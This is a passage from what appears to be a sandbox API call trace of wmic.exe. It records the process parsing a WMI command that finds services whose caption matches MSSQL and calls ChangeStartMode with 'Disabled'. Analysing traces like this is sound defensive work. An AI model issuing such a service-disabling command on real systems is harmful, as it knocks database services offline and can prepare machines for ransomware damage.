pVal=0xabf65c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabf65c*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc6f2a0*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xc63798, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.790] SafeArrayGetLBound (in: psa=0xc6f2a0, nDim=0x1, plLbound=0xabf66c | out: plLbound=0xabf66c) returned 0x0 [0114.790] SafeArrayGetUBound (in: psa=0xc6f2a0, nDim=0x1, plUbound=0xabf670 | out: plUbound=0xabf670) returned 0x0 [0114.790] SafeArrayGetElement (in: psa=0xc6f2a0, rgIndices=0xabf688, pv=0xabf674 | out: pv=0xabf674) returned 0x0 [0114.790] SysStringLen (param_1="Service application management. ") returned 0x20 [0114.790] IUnknown:Release (This=0xc85af8) returned 0x0 [0114.791] ??1CHString@@QAE@XZ () returned 0x1 [0114.791] ??1CHString@@QAE@XZ () returned 0x74a66430 [0114.791] ??1CHString@@QAE@XZ () returned 0x74a66430 [0114.791] lstrlenW (lpString="Service application management. ") returned 32 [0114.791] lstrlenW (lpString="Service application management. ") returned 32 [0114.791] IUnknown:Release (This=0xc85358) returned 0x0 [0114.793] ??1CHString@@QAE@XZ () returned 0x74a66430 [0114.793] lstrlenW (lpString="PATH") returned 4 [0114.793] lstrlenW (lpString="WHERE") returned 5 [0114.793] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0114.793] lstrlenW (lpString="WHERE") returned 5 [0114.793] lstrlenW (lpString="WHERE") returned 5 [0114.793] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0114.793] lstrlenW (lpString="/") returned 1 [0114.793] lstrlenW (lpString="caption LIKE '%MSSQL%'") returned 22 [0114.793] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%MSSQL%'", cchCount1=22, lpString2="/", cchCount2=1) returned 3 [0114.793] lstrlenW (lpString="-") returned 1 [0114.793] lstrlenW (lpString="caption LIKE '%MSSQL%'") returned 22 [0114.793] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%MSSQL%'", cchCount1=22, lpString2="-", cchCount2=1) returned 3 [0114.793] lstrlenW (lpString="caption LIKE '%MSSQL%'") returned 22 [0114.793] lstrlenW (lpString="caption LIKE '%MSSQL%'") returned 22 [0114.793] lstrlenW (lpString="/") returned 1 [0114.793] lstrlenW (lpString="CALL") returned 4 [0114.793] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0114.793] lstrlenW (lpString="-") returned 1 [0114.793] lstrlenW (lpString="CALL") returned 4 [0114.793] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0114.793] lstrlenW (lpString="CALL") returned 4 [0114.793] lstrlenW (lpString="CALL") returned 4 [0114.793] lstrlenW (lpString="GET") returned 3 [0114.793] lstrlenW (lpString="CALL") returned 4 [0114.794] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0114.794] lstrlenW (lpString="LIST") returned 4 [0114.794] lstrlenW (lpString="CALL") returned 4 [0114.794] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0114.794] lstrlenW (lpString="SET") returned 3 [0114.794] lstrlenW (lpString="CALL") returned 4 [0114.794] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0114.794] lstrlenW (lpString="CREATE") returned 6 [0114.794] lstrlenW (lpString="CALL") returned 4 [0114.794] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0114.794] lstrlenW (lpString="CALL") returned 4 [0114.794] lstrlenW (lpString="CALL") returned 4 [0114.794] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0114.794] lstrlenW (lpString="/") returned 1 [0114.794] lstrlenW (lpString="ChangeStartMode") returned 15 [0114.794] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="/", cchCount2=1) returned 3 [0114.794] lstrlenW (lpString="-") returned 1 [0114.794] lstrlenW (lpString="ChangeStartMode") returned 15 [0114.794] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="-", cchCount2=1) returned 3 [0114.794] lstrlenW (lpString="ChangeStartMode") returned 15 [0114.794] lstrlenW (lpString="ChangeStartMode") returned 15 [0114.794] GetCurrentThreadId () returned 0xf0c [0114.794] ??0CHString@@QAE@XZ () returned 0xabef14 [0114.795] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0114.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0xd98b68, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0114.795] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0114.795] SysStringLen (param_1="SERVICE") returned 0x7 [0114.795] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0114.795] SysStringLen (param_1="'") returned 0x1 [0114.795] IWbemServices:GetObject (in: This=0xc60620, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0xabeef0*=0x0, ppCallResult=0x0 | out: ppObject=0xabeef0*=0xc85358, ppCallResult=0x0) returned 0x0 [0114.805] lstrlenW (lpString="CALL") returned 4 [0114.805] lstrlenW (lpString="CALL") returned 4 [0114.805] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0114.805] IWbemClassObject:Get (in: This=0xc85358, wszName="Verbs", lFlags=0, pVal=0xabeea8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabeea8*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc6f450*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xc6f560, rgsabound=((cElements=0xa, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.807] SafeArrayGetLBound (in: psa=0xc6f450, nDim=0x1, plLbound=0xabeeb8 | out: plLbound=0xabeeb8) returned 0x0 [0114.807] SafeArrayGetUBound (in: psa=0xc6f450, nDim=0x1, plUbound=0xabeec0 | out: plUbound=0xabeec0) returned 0x0 [0114.807] SafeArrayGetElement (in: psa=0xc6f450, rgIndices=0xabeec8, pv=0xabeefc | out: pv=0xabeefc) returned 0x0 [0114.807] IWbemClassObject:Get (in: This=0xc86d20, wszName="Name", lFlags=0, pVal=0xabee98*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabee98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.807] lstrlenW (lpString="StartService") returned 12 [0114.807] lstrlenW (lpString="ChangeStartMode") returned 15 [0114.807] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="StartService", cchCount2=12) returned 1 [0114.807] IUnknown:Release (This=0xc86d20) returned 0x1 [0114.807] SafeArrayGetElement (in: psa=0xc6f450, rgIndices=0xabeec8, pv=0xabeefc | out: pv=0xabeefc) returned 0x0 [0114.807] IWbemClassObject:Get (in: This=0xc87250, wszName="Name", lFlags=0, pVal=0xabee98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabee98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.808] lstrlenW (lpString="StopService") returned 11 [0114.808] lstrlenW (lpString="ChangeStartMode") returned 15 [0114.808] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="StopService", cchCount2=11) returned 1 [0114.808] IUnknown:Release (This=0xc87250) returned 0x1 [0114.808] SafeArrayGetElement (in: psa=0xc6f450, rgIndices=0xabeec8, pv=0xabeefc | out: pv=0xabeefc) returned 0x0 [0114.808] IWbemClassObject:Get (in: This=0xc87790, wszName="Name", lFlags=0, pVal=0xabee98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabee98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PauseService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.808] lstrlenW (lpString="PauseService") returned 12 [0114.808] lstrlenW (lpString="ChangeStartMode") returned 15 [0114.808] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="PauseService", cchCount2=12) returned 1 [0114.808] IUnknown:Release (This=0xc87790) returned 0x1 [0114.808] SafeArrayGetElement (in: psa=0xc6f450, rgIndices=0xabeec8, pv=0xabeefc | out: pv=0xabeefc) returned 0x0 [0114.808] IWbemClassObject:Get (in: This=0xc87cd0, wszName="Name", lFlags=0, pVal=0xabee98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PauseService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabee98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ResumeService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.808] lstrlenW (lpString="ResumeService") returned 13 [0114.808] lstrlenW (lpString="ChangeStartMode") returned 15 [0114.808] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="ResumeService", cchCount2=13) returned 1 [0114.808] IUnknown:Release (This=0xc87cd0) returned 0x1 [0114.808] SafeArrayGetElement (in: psa=0xc6f450, rgIndices=0xabeec8, pv=0xabeefc | out: pv=0xabeefc) returned 0x0 [0114.809] IWbemClassObject:Get (in: This=0xc88238, wszName="Name", lFlags=0, pVal=0xabee98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ResumeService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabee98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InterrogateService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.809] lstrlenW (lpString="InterrogateService") returned 18 [0114.809] lstrlenW (lpString="ChangeStartMode") returned 15 [0114.809] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="InterrogateService", cchCount2=18) returned 1 [0114.809] IUnknown:Release (This=0xc88238) returned 0x1 [0114.809] SafeArrayGetElement (in: psa=0xc6f450, rgIndices=0xabeec8, pv=0xabeefc | out: pv=0xabeefc) returned 0x0 [0114.809] IWbemClassObject:Get (in: This=0xc88c40, wszName="Name", lFlags=0, pVal=0xabee98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InterrogateService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabee98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserControlService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.809] lstrlenW (lpString="UserControlService") returned 18 [0114.809] lstrlenW (lpString="ChangeStartMode") returned 15 [0114.809] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="UserControlService", cchCount2=18) returned 1 [0114.809] IUnknown:Release (This=0xc88c40) returned 0x1 [0114.809] SafeArrayGetElement (in: psa=0xc6f450, rgIndices=0xabeec8, pv=0xabeefc | out: pv=0xabeefc) returned 0x0 [0114.809] IWbemClassObject:Get (in: This=0xc8cc48, wszName="Name", lFlags=0, pVal=0xabee98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserControlService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabee98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Create", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.809] lstrlenW (lpString="Create") returned 6 [0114.810] lstrlenW (lpString="ChangeStartMode") returned 15 [0114.810] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="Create", cchCount2=6) returned 1 [0114.810] IUnknown:Release (This=0xc8cc48) returned 0x1 [0114.810] SafeArrayGetElement (in: psa=0xc6f450, rgIndices=0xabeec8, pv=0xabeefc | out: pv=0xabeefc) returned 0x0 [0114.810] IWbemClassObject:Get (in: This=0xc90918, wszName="Name", lFlags=0, pVal=0xabee98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Create", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabee98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Change", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.810] lstrlenW (lpString="Change") returned 6 [0114.810] lstrlenW (lpString="ChangeStartMode") returned 15 [0114.810] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="Change", cchCount2=6) returned 3 [0114.810] IUnknown:Release (This=0xc90918) returned 0x1 [0114.810] SafeArrayGetElement (in: psa=0xc6f450, rgIndices=0xabeec8, pv=0xabeefc | out: pv=0xabeefc) returned 0x0 [0114.810] IWbemClassObject:Get (in: This=0xc915a0, wszName="Name", lFlags=0, pVal=0xabee98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Change", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabee98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ChangeStartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.810] lstrlenW (lpString="ChangeStartMode") returned 15 [0114.810] lstrlenW (lpString="ChangeStartMode") returned 15 [0114.810] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="ChangeStartMode", cchCount2=15) returned 2 [0114.810] GetCurrentThreadId () returned 0xf0c [0114.810] ??0CHString@@QAE@XZ () returned 0xabed14 [0114.810] IWbemClassObject:Get (in: This=0xc915a0, wszName="Description", lFlags=0, pVal=0xabece4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabece4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The ChangeStartMode method modifies the StartMode of a service. It returns an integer value of 0 if the service was successfully modified, 1 if the request is not supported, and any other number to indicate an error.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.810] ??1CHString@@QAE@XZ () returned 0x74a66430 [0114.810] IWbemClassObject:Get (in: This=0xc915a0, wszName="Parameters", lFlags=0, pVal=0xabee88*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabee88*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc6f420*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xc63658, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.811] IWbemClassObject:Get (in: This=0xc915a0, wszName="VerbType", lFlags=0, pVal=0xabee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabee20*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.811] IWbemClassObject:Get (in: This=0xc915a0, wszName="Derivation", lFlags=0, pVal=0xabee08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabee08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ChangeStartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.811] lstrlenW (lpString="ChangeStartMode") returned 15 [0114.811] lstrlenW (lpString="ChangeStartMode") returned 15 [0114.811] SafeArrayGetLBound (in: psa=0xc6f420, nDim=0x1, plLbound=0xabeebc | out: plLbound=0xabeebc) returned 0x0 [0114.811] SafeArrayGetUBound (in: psa=0xc6f420, nDim=0x1, plUbound=0xabeed8 | out: plUbound=0xabeed8) returned 0x0 [0114.811] SafeArrayGetElement (in: psa=0xc6f420, rgIndices=0xabeedc, pv=0xabeee8 | out: pv=0xabeee8) returned 0x0 [0114.811] IWbemClassObject:Get (in: This=0xc92640, wszName="ParaId", lFlags=0, pVal=0xabee38*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabee38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.811] IWbemClassObject:Get (in: This=0xc92640, wszName="Type", lFlags=0, pVal=0xabedd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabedd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="STRING", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.811] IWbemClassObject:Get (in: This=0xc92640, wszName="Default", lFlags=0, pVal=0xabedf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabedf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.812] GetCurrentThreadId () returned 0xf0c [0114.812] ??0CHString@@QAE@XZ () returned 0xabed24 [0114.812] IWbemClassObject:Get (in: This=0xc92640, wszName="Qualifiers", lFlags=0, pVal=0xabecac*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabecac*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc6f2a0*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xc637c8, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.812] SafeArrayGetLBound (in: psa=0xc6f2a0, nDim=0x1, plLbound=0xabecdc | out: plLbound=0xabecdc) returned 0x0 [0114.812] SafeArrayGetUBound (in: psa=0xc6f2a0, nDim=0x1, plUbound=0xabecf0 | out: plUbound=0xabecf0) returned 0x0 [0114.812] SafeArrayGetElement (in: psa=0xc6f2a0, rgIndices=0xabecfc, pv=0xabed1c | out: pv=0xabed1c) returned 0x0 [0114.812] IWbemClassObject:Get (in: This=0xc928f8, wszName="Name", lFlags=0, pVal=0xabecc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabecc4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="In", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.812] IWbemClassObject:Get (in: This=0xc928f8, wszName="QualifierValue", lFlags=0, pVal=0xabec9c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabec9c*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc6f480*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xc637d8, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.812] SafeArrayGetLBound (in: psa=0xc6f480, nDim=0x1, plLbound=0xabece0 | out: plLbound=0xabece0) returned 0x0 [0114.812] SafeArrayGetUBound (in: psa=0xc6f480, nDim=0x1, plUbound=0xabecc0 | out: plUbound=0xabecc0) returned 0x0 [0114.812] lstrlenW (lpString="CIMTYPE") returned 7 [0114.812] lstrlenW (lpString="In") returned 2 [0114.812] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="CIMTYPE", cchCount2=7) returned 3 [0114.812] lstrlenW (lpString="read") returned 4 [0114.812] lstrlenW (lpString="In") returned 2 [0114.812] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="read", cchCount2=4) returned 1 [0114.812] lstrlenW (lpString="write") returned 5 [0114.812] lstrlenW (lpString="In") returned 2 [0114.813] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="write", cchCount2=5) returned 1 [0114.813] lstrlenW (lpString="In") returned 2 [0114.813] lstrlenW (lpString="In") returned 2 [0114.813] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="In", cchCount2=2) returned 2 [0114.813] SafeArrayGetElement (in: psa=0xc6f480, rgIndices=0xabed08, pv=0xabed10 | out: pv=0xabed10) returned 0x0 [0114.813] lstrlenW (lpString="true") returned 4 [0114.813] lstrlenW (lpString="True") returned 4 [0114.813] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="True", cchCount1=4, lpString2="true", cchCount2=4) returned 2 [0114.813] IUnknown:Release (This=0xc928f8) returned 0x1 [0114.813] SafeArrayGetElement (in: psa=0xc6f2a0, rgIndices=0xabecfc, pv=0xabed1c | out: pv=0xabed1c) returned 0x0 [0114.813] IWbemClassObject:Get (in: This=0xc92c30, wszName="Name", lFlags=0, pVal=0xabecc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc626fc, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabecc4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ValueMap", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.814] IWbemClassObject:Get (in: This=0xc92c30, wszName="QualifierValue", lFlags=0, pVal=0xabec9c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc6f480, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabec9c*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc6f480*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xc62bb8, rgsabound=((cElements=0x5, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.814] SafeArrayGetLBound (in: psa=0xc6f480, nDim=0x1, plLbound=0xabece0 | out: plLbound=0xabece0) returned 0x0 [0114.814] SafeArrayGetUBound (in: psa=0xc6f480, nDim=0x1, plUbound=0xabecc0 | out: plUbound=0xabecc0) returned 0x0 [0114.814] lstrlenW (lpString="CIMTYPE") returned 7 [0114.814] lstrlenW (lpString="ValueMap") returned 8 [0114.814] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="CIMTYPE", cchCount2=7) returned 3 [0114.814] lstrlenW (lpString="read") returned 4 [0114.814] lstrlenW (lpString="ValueMap") returned 8 [0114.814] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="read", cchCount2=4) returned 3 [0114.814] lstrlenW (lpString="write") returned 5 [0114.814] lstrlenW (lpString="ValueMap") returned 8 [0114.814] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="write", cchCount2=5) returned 1 [0114.814] lstrlenW (lpString="In") returned 2 [0114.814] lstrlenW (lpString="ValueMap") returned 8 [0114.814] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="In", cchCount2=2) returned 3 [0114.814] lstrlenW (lpString="Out") returned 3 [0114.814] lstrlenW (lpString="ValueMap") returned 8 [0114.814] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="Out", cchCount2=3) returned 3 [0114.814] SafeArrayGetElement (in: psa=0xc6f480, rgIndices=0xabed08, pv=0xabed10 | out: pv=0xabed10) returned 0x0 [0114.814] SafeArrayGetElement (in: psa=0xc6f480, rgIndices=0xabed08, pv=0xabed10 | out: pv=0xabed10) returned 0x0 [0114.814] SafeArrayGetElement (in: psa=0xc6f480, rgIndices=0xabed08, pv=0xabed10 | out: pv=0xabed10) returned 0x0 [0114.815] SafeArrayGetElement (in: psa=0xc6f480, rgIndices=0xabed08, pv=0xabed10 | out: pv=0xabed10) returned 0x0 [0114.815] SafeArrayGetElement (in: psa=0xc6f480, rgIndices=0xabed08, pv=0xabed10 | out: pv=0xabed10) returned 0x0 [0114.815] SysStringLen (param_1="ValueMap") returned 0x8 [0114.815] SysStringLen (param_1="In") returned 0x2 [0114.815] SysStringLen (param_1="In") returned 0x2 [0114.815] SysStringLen (param_1="ValueMap") returned 0x8 [0114.815] IUnknown:Release (This=0xc92c30) returned 0x1 [0114.815] ??1CHString@@QAE@XZ () returned 0x74a66430 [0114.815] IUnknown:Release (This=0xc92640) returned 0x1 [0114.816] IUnknown:Release (This=0xc915a0) returned 0x1 [0114.816] IUnknown:Release (This=0xc85358) returned 0x0 [0114.817] ??1CHString@@QAE@XZ () returned 0x74a66430 [0114.817] lstrlenW (lpString="/") returned 1 [0114.817] lstrlenW (lpString="Disabled") returned 8 [0114.817] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="/", cchCount2=1) returned 3 [0114.817] lstrlenW (lpString="-") returned 1 [0114.817] lstrlenW (lpString="Disabled") returned 8 [0114.817] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="-", cchCount2=1) returned 3 [0114.817] lstrlenW (lpString="Disabled") returned 8 [0114.817] lstrlenW (lpString="Disabled") returned 8 [0114.817] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0114.817] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0114.817] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x8bd7c938 | out: _String="Select", _Context=0x8bd7c938) returned="Select" [0114.818] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x8bd7c938 | out: _String=0x0, _Context=0x8bd7c938) returned="*" [0114.818] lstrlenW (lpString="FROM") returned 4 [0114.818] lstrlenW (lpString="*") returned 1 [0114.818] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0114.818] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x8bd7c938 | out: _String=0x0, _Context=0x8bd7c938) returned="from" [0114.818] lstrlenW (lpString="FROM") returned 4 [0114.818] lstrlenW (lpString="from") returned 4 [0114.818] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0114.818] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x8bd7c938 | out: _String=0x0, _Context=0x8bd7c938) returned="Win32_Service" [0114.818] lstrlenW (lpString="SET") returned 3 [0114.818] lstrlenW (lpString="CALL") returned 4 [0114.818] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0114.818] lstrlenW (lpString="CREATE") returned 6 [0114.818] lstrlenW (lpString="CALL") returned 4 [0114.818] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 